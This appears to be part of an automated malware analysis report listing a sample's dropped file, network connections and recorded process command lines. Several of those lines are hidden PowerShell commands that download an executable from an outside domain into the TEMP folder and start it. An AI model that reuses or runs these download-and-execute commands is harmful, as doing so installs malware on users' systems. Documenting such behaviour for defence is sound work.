Technical Information
- %TEMP%\bk595096.exe
- 'localhost':8080
- 'vc###ibrary.uk':443
- 'localhost':49695
- 'vc###ibrary.uk':443
- 'localhost':49697
- 'localhost':49700
- 'localhost':49701
- 'localhost':49702
- 'localhost':49703
- 'localhost':49705
- DNS ASK vc###ibrary.uk
- '22#.0.0.111':4445
- '255.255.255.255':4445
- '<LOCALNET>..48.255':4445
- '%TEMP%\bk595096.exe'
- '<SYSTEM32>\cmd.exe' /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=d4vm3kRIU7hPzdWB0oDSW001.txt' -OutFile $env:TEMP\BK595096.exe; Start-Proc...
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=d4vm3kRIU7hPzdWB0oDSW001.txt' -OutFile $env:TEMP\BK595096.exe; Start-Process -FilePath $env:TEM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=d4vm3kRIU7hPzdWB0oDSW001.txt' -OutFile $env:TEMP\BK595096.exe; Start-Process -FilePath $env:TEMP\BK595096.exe...
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "<Full path to file>"
- '%TEMP%\bk595096.exe' ' (with hidden window)